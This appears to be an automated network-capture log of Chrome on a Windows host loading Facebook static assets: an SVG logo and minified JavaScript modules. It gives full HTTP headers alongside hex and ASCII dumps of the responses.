                                                                                                                                                                                                                                  report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                  timing-allow-origin: *
                                                                                                                                                                                                                                  document-policy: force-load-at-top
                                                                                                                                                                                                                                  permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                  cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                  origin-agent-cluster: ?1
                                                                                                                                                                                                                                  X-FB-Debug: yPMhPUpxHXGWyPZ8Bm/96y8BvPHTvQNuRGtxFKVQ2eB+rP4+zm1fBc/X/ZpKsaQm6+lTwP6wgXZppDnUmyfqxg==
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 04:53:17 GMT
                                                                                                                                                                                                                                  X-FB-Connection-Quality: GOOD; q=0.7, rtt=88, rtx=0, c=14, mss=1392, tbw=3413, tp=-1, tpl=-1, uplat=1, ullat=-1
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Content-Length: 2549
                                                                                                                                                                                                                                  2024-09-29 04:53:17 UTC1INData Raw: 3c
                                                                                                                                                                                                                                  Data Ascii: <
                                                                                                                                                                                                                                  2024-09-29 04:53:17 UTC2548INData Raw: 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 30 39 30 22 20 68 65 69 67 68 74 3d 22 33 36 30 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 39 30 20 33 36 30 22 3e 0a 20 20 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 30 38 36 36 46 46 22 20 64 3d 22 4d 38 38 31 2e 35 38 33 20 32 35 37 2e 38 39 37 68 32 39 2e 34 38 76 2d 34 37 2e 36 39 36 6c 34 31 2e 31 33 37 20 34 37 2e 36 39 36 68 33 36 2e 30 37 32 6c 2d 34 37 2e 38 39 2d 35 34 2e 39 36 39 20 34 30 2e 39 30 39 2d 34 37 2e 36 36 33 68 2d 33 32 2e 38 32 35 6c 2d 33 37 2e 34 30 33 20 34 33 2e 39 33 76 2d 39 36 2e 39 38 32 6c 2d 32 39 2e 34 38 20 33 2e 38 36 34 76 31 35 31 2e 38
                                                                                                                                                                                                                                  Data Ascii: svg xmlns="http://www.w3.org/2000/svg" width="1090" height="360" fill="none" viewBox="0 0 1090 360"> <path fill="#0866FF" d="M881.583 257.897h29.48v-47.696l41.137 47.696h36.072l-47.89-54.969 40.909-47.663h-32.825l-37.403 43.93v-96.982l-29.48 3.864v151.8


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  26192.168.2.649752157.240.251.94431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:17 UTC581OUTGET /rsrc.php/v3/y6/r/a2il9m3oo2U.js HTTP/1.1
                                                                                                                                                                                                                                  Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  Origin: https://www.facebook.com
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                                                  Referer: https://www.facebook.com/
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:17 UTC1944INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                  content-md5: 8rx6czt+CAsqvWjnRr01qQ==
                                                                                                                                                                                                                                  Expires: Fri, 19 Sep 2025 18:36:38 GMT
                                                                                                                                                                                                                                  Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                  report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                  timing-allow-origin: *
                                                                                                                                                                                                                                  document-policy: force-load-at-top
                                                                                                                                                                                                                                  permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                  cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                  origin-agent-cluster: ?1
                                                                                                                                                                                                                                  X-FB-Debug: ID41J++cu6/7GjofaLINA3bU1pMzB7jL/PvMk2d9xgh8eiLjktB2oFv1voZhTJp/ZFN7OQl66Bdr5cD1FAX46g==
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 04:53:17 GMT
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: https://www.facebook.com
                                                                                                                                                                                                                                  Vary: Origin
                                                                                                                                                                                                                                  X-FB-Connection-Quality: GOOD; q=0.7, rtt=89, rtx=0, c=14, mss=1392, tbw=3412, tp=-1, tpl=-1, uplat=0, ullat=-1
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Content-Length: 49300
                                                                                                                                                                                                                                  2024-09-29 04:53:17 UTC1INData Raw: 3b
                                                                                                                                                                                                                                  Data Ascii: ;
                                                                                                                                                                                                                                  2024-09-29 04:53:17 UTC15871INData Raw: 2f 2a 46 42 5f 50 4b 47 5f 44 45 4c 49 4d 2a 2f 0a 0a 5f 5f 64 28 22 41 72 62 69 74 65 72 4d 69 78 69 6e 22 2c 5b 22 41 72 62 69 74 65 72 22 2c 22 67 75 69 64 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 29 7b 76 61 72 20 68 3d 22 61 72 62 69 74 65 72 24 22 2b 63 28 22 67 75 69 64 22 29 28 29 2c 69 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 3b 61 3d 7b 5f 67 65 74 41 72 62 69 74 65 72 49 6e 73 74 61 6e 63 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 69 2e 63 61 6c 6c 28 74 68 69 73 2c 68 29 3f 74 68 69 73 5b 68 5d 3a 74 68 69 73 5b 68 5d 3d 6e 65 77 28 63 28 22 41 72 62 69 74 65 72 22 29 29 28 29 7d 2c 69 6e 66 6f 72 6d 3a 66 75 6e 63 74 69 6f 6e 28 61 2c
                                                                                                                                                                                                                                  Data Ascii: /*FB_PKG_DELIM*/__d("ArbiterMixin",["Arbiter","guid"],(function(a,b,c,d,e,f,g){var h="arbiter$"+c("guid")(),i=Object.prototype.hasOwnProperty;a={_getArbiterInstance:function(){return i.call(this,h)?this[h]:this[h]=new(c("Arbiter"))()},inform:function(a,
                                                                                                                                                                                                                                  2024-09-29 04:53:17 UTC16384INData Raw: 34 37 2c 63 2c 74 79 70 65 6f 66 20 63 29 3b 72 65 74 75 72 6e 20 61 3d 3d 3d 31 3f 5b 69 2c 63 2c 22 2a 22 5d 3a 5b 63 2c 22 2a 22 5d 7d 2c 67 65 74 47 65 6e 64 65 72 56 61 72 69 61 74 69 6f 6e 73 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 26 62 28 22 49 6e 74 6c 56 61 72 69 61 74 69 6f 6e 73 22 29 2e 42 49 54 4d 41 53 4b 5f 47 45 4e 44 45 52 7c 7c 67 28 30 2c 31 31 36 34 38 2c 61 2c 74 79 70 65 6f 66 20 61 29 3b 72 65 74 75 72 6e 5b 61 2c 22 2a 22 5d 7d 7d 3b 65 2e 65 78 70 6f 72 74 73 3d 61 7d 29 2c 6e 75 6c 6c 29 3b 0a 5f 5f 64 28 22 49 6e 74 6c 56 61 72 69 61 74 69 6f 6e 52 65 73 6f 6c 76 65 72 22 2c 5b 22 49 6e 74 6c 56 61 72 69 61 74 69 6f 6e 48 6f 6c 64 6f 75 74 22 2c 22 49 6e 74 6c 56 61 72 69 61 74 69 6f 6e 52 65 73 6f 6c 76 65 72 49 6d 70 6c 22
                                                                                                                                                                                                                                  Data Ascii: 47,c,typeof c);return a===1?[i,c,"*"]:[c,"*"]},getGenderVariations:function(a){a&b("IntlVariations").BITMASK_GENDER||g(0,11648,a,typeof a);return[a,"*"]}};e.exports=a}),null);__d("IntlVariationResolver",["IntlVariationHoldout","IntlVariationResolverImpl"
                                                                                                                                                                                                                                  2024-09-29 04:53:17 UTC16384INData Raw: 3d 6e 75 6c 6c 3f 62 3a 61 2e 73 65 72 69 61 6c 69 7a 65 72 29 3b 64 3d 63 2e 6c 65 6e 67 74 68 3e 30 3f 22 3f 22 3a 22 22 3b 62 3d 61 2e 66 72 61 67 6d 65 6e 74 21 3d 3d 22 22 3f 22 23 22 2b 61 2e 66 72 61 67 6d 65 6e 74 3a 22 22 3b 61 3d 61 2e 66 72 61 67 6d 65 6e 74 3d 3d 3d 22 22 26 26 61 2e 66 72 61 67 6d 65 6e 74 53 65 70 61 72 61 74 6f 72 3f 22 23 22 3a 22 22 3b 72 65 74 75 72 6e 22 22 2b 65 2b 66 2b 67 2b 68 2b 64 2b 63 2b 61 2b 62 7d 66 75 6e 63 74 69 6f 6e 20 7a 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 29 7b 65 3d 3d 3d 76 6f 69 64 20 30 26 26 28 65 3d 21 31 29 3b 69 66 28 21 64 26 26 28 65 7c 7c 75 28 61 29 29 29 7b 72 65 74 75 72 6e 28 64 3d 62 29 21 3d 6e 75 6c 6c 3f 64 3a 22 22 7d 72 65 74 75 72 6e 20 73 28 63 2c 66 29 7d 66 75 6e 63 74 69 6f 6e
                                                                                                                                                                                                                                  Data Ascii: =null?b:a.serializer);d=c.length>0?"?":"";b=a.fragment!==""?"#"+a.fragment:"";a=a.fragment===""&&a.fragmentSeparator?"#":"";return""+e+f+g+h+d+c+a+b}function z(a,b,c,d,e,f){e===void 0&&(e=!1);if(!d&&(e||u(a))){return(d=b)!=null?d:""}return s(c,f)}function
                                                                                                                                                                                                                                  2024-09-29 04:53:17 UTC660INData Raw: 61 73 68 3b 72 65 74 75 72 6e 20 63 28 22 46 62 74 52 65 73 75 6c 74 47 4b 22 29 2e 69 6e 6c 69 6e 65 4d 6f 64 65 21 3d 6e 75 6c 6c 26 26 63 28 22 46 62 74 52 65 73 75 6c 74 47 4b 22 29 2e 69 6e 6c 69 6e 65 4d 6f 64 65 21 3d 3d 22 4e 4f 5f 49 4e 4c 49 4e 45 22 3f 6e 65 77 28 63 28 22 49 6e 6c 69 6e 65 46 62 74 52 65 73 75 6c 74 22 29 29 28 62 2c 63 28 22 46 62 74 52 65 73 75 6c 74 47 4b 22 29 2e 69 6e 6c 69 6e 65 4d 6f 64 65 2c 64 2c 65 29 3a 63 28 22 46 62 74 52 65 73 75 6c 74 22 29 2e 67 65 74 28 61 29 7d 67 5b 22 64 65 66 61 75 6c 74 22 5d 3d 61 7d 29 2c 39 38 29 3b 0a 5f 5f 64 28 22 69 73 53 74 72 69 6e 67 4e 75 6c 6c 4f 72 45 6d 70 74 79 22 2c 5b 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 29 7b 22 75 73 65 20 73 74 72 69 63
                                                                                                                                                                                                                                  Data Ascii: ash;return c("FbtResultGK").inlineMode!=null&&c("FbtResultGK").inlineMode!=="NO_INLINE"?new(c("InlineFbtResult"))(b,c("FbtResultGK").inlineMode,d,e):c("FbtResult").get(a)}g["default"]=a}),98);__d("isStringNullOrEmpty",[],(function(a,b,c,d,e,f){"use stric


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  27192.168.2.649756157.240.251.94431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:18 UTC592OUTGET /rsrc.php/v3i6l24/yP/l/ru_RU/GcN06huceZG.js HTTP/1.1
                                                                                                                                                                                                                                  Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  Origin: https://www.facebook.com
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                                                  Referer: https://www.facebook.com/
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:18 UTC1944INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                  content-md5: mSPkTjocO3asr/CIDMBqtw==
                                                                                                                                                                                                                                  Expires: Sun, 28 Sep 2025 17:13:26 GMT
                                                                                                                                                                                                                                  Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                  report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                  timing-allow-origin: *
                                                                                                                                                                                                                                  document-policy: force-load-at-top
                                                                                                                                                                                                                                  permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                  cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                  origin-agent-cluster: ?1
                                                                                                                                                                                                                                  X-FB-Debug: ToNDTQmI806W/PTW093CMF8BCdyROaGrzuQagBW81OmeiT0kVmoLUnNpX2/qV/ZQ98b1eflgyFiX2oTzNDCazw==
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 04:53:18 GMT
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: https://www.facebook.com
                                                                                                                                                                                                                                  Vary: Origin
                                                                                                                                                                                                                                  X-FB-Connection-Quality: GOOD; q=0.7, rtt=94, rtx=0, c=14, mss=1392, tbw=3413, tp=-1, tpl=-1, uplat=1, ullat=-1
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Content-Length: 50088
                                                                                                                                                                                                                                  2024-09-29 04:53:18 UTC1INData Raw: 3b
                                                                                                                                                                                                                                  Data Ascii: ;
                                                                                                                                                                                                                                  2024-09-29 04:53:18 UTC15861INData Raw: 2f 2a 46 42 5f 50 4b 47 5f 44 45 4c 49 4d 2a 2f 0a 0a 5f 5f 64 28 22 41 73 79 6e 63 44 4f 4d 22 2c 5b 22 43 53 53 22 2c 22 44 4f 4d 22 2c 22 46 42 4c 6f 67 67 65 72 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 29 7b 61 3d 7b 69 6e 76 6f 6b 65 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 63 29 7b 66 6f 72 28 76 61 72 20 64 3d 30 3b 64 3c 61 2e 6c 65 6e 67 74 68 3b 2b 2b 64 29 7b 76 61 72 20 65 3d 61 5b 64 5d 2c 66 3d 65 5b 30 5d 2c 67 3d 65 5b 31 5d 2c 68 3d 65 5b 32 5d 3b 65 3d 65 5b 33 5d 3b 68 3d 68 26 26 63 7c 7c 6e 75 6c 6c 3b 67 26 26 28 68 3d 62 28 22 44 4f 4d 22 29 2e 73 63 72 79 28 68 7c 7c 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2c 67 29 5b 30 5d 29 3b 68 7c 7c 62 28 22 46 42 4c 6f 67 67 65 72 22
                                                                                                                                                                                                                                  Data Ascii: /*FB_PKG_DELIM*/__d("AsyncDOM",["CSS","DOM","FBLogger"],(function(a,b,c,d,e,f){a={invoke:function(a,c){for(var d=0;d<a.length;++d){var e=a[d],f=e[0],g=e[1],h=e[2];e=e[3];h=h&&c||null;g&&(h=b("DOM").scry(h||document.documentElement,g)[0]);h||b("FBLogger"
                                                                                                                                                                                                                                  2024-09-29 04:53:18 UTC16384INData Raw: 65 20 64 69 73 70 6c 61 79 20 73 74 61 72 74 65 64 2e 20 54 68 69 73 20 69 73 20 61 20 6e 6f 2d 6f 70 2e 22 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 7d 76 61 72 20 61 2c 62 3d 6e 65 77 28 63 28 22 44 65 66 65 72 72 65 64 22 29 29 28 29 3b 65 2e 70 75 73 68 28 62 2e 67 65 74 50 72 6f 6d 69 73 65 28 29 29 3b 72 65 74 75 72 6e 20 63 28 22 54 69 6d 65 53 6c 69 63 65 22 29 2e 67 75 61 72 64 28 66 75 6e 63 74 69 6f 6e 28 29 7b 61 26 26 63 28 22 63 6c 65 61 72 54 69 6d 65 6f 75 74 22 29 28 61 29 2c 62 2e 72 65 73 6f 6c 76 65 28 29 7d 2c 22 41 73 79 6e 63 52 65 71 75 65 73 74 44 69 73 70 6c 61 79 42 6c 6f 63 6b 69 6e 67 45 76 65 6e 74 22 2c 7b 70 72 6f 70 61 67 61 74 69 6f 6e 54 79 70 65 3a 63 28 22 54 69 6d 65 53 6c 69 63 65 22 29 2e 50 72
                                                                                                                                                                                                                                  Data Ascii: e display started. This is a no-op.");return function(){}}var a,b=new(c("Deferred"))();e.push(b.getPromise());return c("TimeSlice").guard(function(){a&&c("clearTimeout")(a),b.resolve()},"AsyncRequestDisplayBlockingEvent",{propagationType:c("TimeSlice").Pr
                                                                                                                                                                                                                                  2024-09-29 04:53:18 UTC16384INData Raw: 2e 61 62 6f 72 74 28 29 3b 61 2e 73 65 74 54 72 61 6e 73 70 6f 72 74 45 72 72 6f 72 48 61 6e 64 6c 65 72 28 64 29 7d 61 2e 61 62 6f 72 74 48 61 6e 64 6c 65 72 28 29 3b 4b 2e 75 6e 73 63 68 65 64 75 6c 65 28 61 29 7d 29 7d 3b 65 2e 61 62 61 6e 64 6f 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 74 68 69 73 3b 74 68 69 73 2e 63 6f 6e 74 69 6e 75 61 74 69 6f 6e 2e 6c 61 73 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 62 3b 63 28 22 63 6c 65 61 72 54 69 6d 65 6f 75 74 22 29 28 61 2e 74 69 6d 65 72 29 3b 61 2e 73 65 74 4f 70 74 69 6f 6e 28 22 73 75 70 70 72 65 73 73 45 72 72 6f 72 41 6c 65 72 74 73 22 2c 21 30 29 2e 73 65 74 48 61 6e 64 6c 65 72 28 62 3d 63 28 22 65 6d 70 74 79 46 75 6e 63 74 69 6f 6e 22 29 29 2e 73 65 74 45 72 72 6f 72 48 61
                                                                                                                                                                                                                                  Data Ascii: .abort();a.setTransportErrorHandler(d)}a.abortHandler();K.unschedule(a)})};e.abandon=function(){var a=this;this.continuation.last(function(){var b;c("clearTimeout")(a.timer);a.setOption("suppressErrorAlerts",!0).setHandler(b=c("emptyFunction")).setErrorHa
                                                                                                                                                                                                                                  2024-09-29 04:53:18 UTC1458INData Raw: 2c 63 3b 28 61 3d 62 28 22 41 72 62 69 74 65 72 22 29 29 2e 72 65 67 69 73 74 65 72 43 61 6c 6c 62 61 63 6b 28 68 2c 5b 28 63 3d 62 28 22 50 61 67 65 45 76 65 6e 74 73 22 29 29 2e 42 49 47 50 49 50 45 5f 44 4f 4d 52 45 41 44 59 2c 62 28 22 49 6e 69 74 69 61 6c 4a 53 4c 6f 61 64 65 72 22 29 2e 49 4e 49 54 49 41 4c 5f 4a 53 5f 52 45 41 44 59 5d 29 3b 61 2e 72 65 67 69 73 74 65 72 43 61 6c 6c 62 61 63 6b 28 69 2c 5b 63 2e 42 49 47 50 49 50 45 5f 44 4f 4d 52 45 41 44 59 2c 63 2e 42 49 47 50 49 50 45 5f 4f 4e 4c 4f 41 44 2c 62 28 22 49 6e 69 74 69 61 6c 4a 53 4c 6f 61 64 65 72 22 29 2e 49 4e 49 54 49 41 4c 5f 4a 53 5f 52 45 41 44 59 5d 29 3b 61 2e 73 75 62 73 63 72 69 62 65 28 63 2e 4e 41 54 49 56 45 5f 4f 4e 42 45 46 4f 52 45 55 4e 4c 4f 41 44 2c 66 75 6e 63
                                                                                                                                                                                                                                  Data Ascii: ,c;(a=b("Arbiter")).registerCallback(h,[(c=b("PageEvents")).BIGPIPE_DOMREADY,b("InitialJSLoader").INITIAL_JS_READY]);a.registerCallback(i,[c.BIGPIPE_DOMREADY,c.BIGPIPE_ONLOAD,b("InitialJSLoader").INITIAL_JS_READY]);a.subscribe(c.NATIVE_ONBEFOREUNLOAD,func


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  28192.168.2.649754157.240.251.94431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:18 UTC581OUTGET /rsrc.php/v3/y-/r/v87V0xuYr4I.js HTTP/1.1
                                                                                                                                                                                                                                  Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  Origin: https://www.facebook.com
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                                                  Referer: https://www.facebook.com/
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:18 UTC1943INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                  content-md5: rDEOmqaAM5ZkPMcF0pIIHw==
                                                                                                                                                                                                                                  Expires: Sun, 28 Sep 2025 18:03:57 GMT
                                                                                                                                                                                                                                  Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                  report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                  timing-allow-origin: *
                                                                                                                                                                                                                                  document-policy: force-load-at-top
                                                                                                                                                                                                                                  permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                  cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                  origin-agent-cluster: ?1
                                                                                                                                                                                                                                  X-FB-Debug: hRmGUuQ2ODDByuTT1cHvDlZWF4cRURchQGls5v08WF/6rIPgjkgua/l5LerpwOCuuDCebk9bBL65+owsCZZrLA==
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 04:53:18 GMT
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: https://www.facebook.com
                                                                                                                                                                                                                                  Vary: Origin
                                                                                                                                                                                                                                  X-FB-Connection-Quality: GOOD; q=0.7, rtt=88, rtx=0, c=14, mss=1392, tbw=3411, tp=-1, tpl=-1, uplat=1, ullat=-1
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Content-Length: 5493
                                                                                                                                                                                                                                  2024-09-29 04:53:18 UTC1INData Raw: 3b
                                                                                                                                                                                                                                  Data Ascii: ;
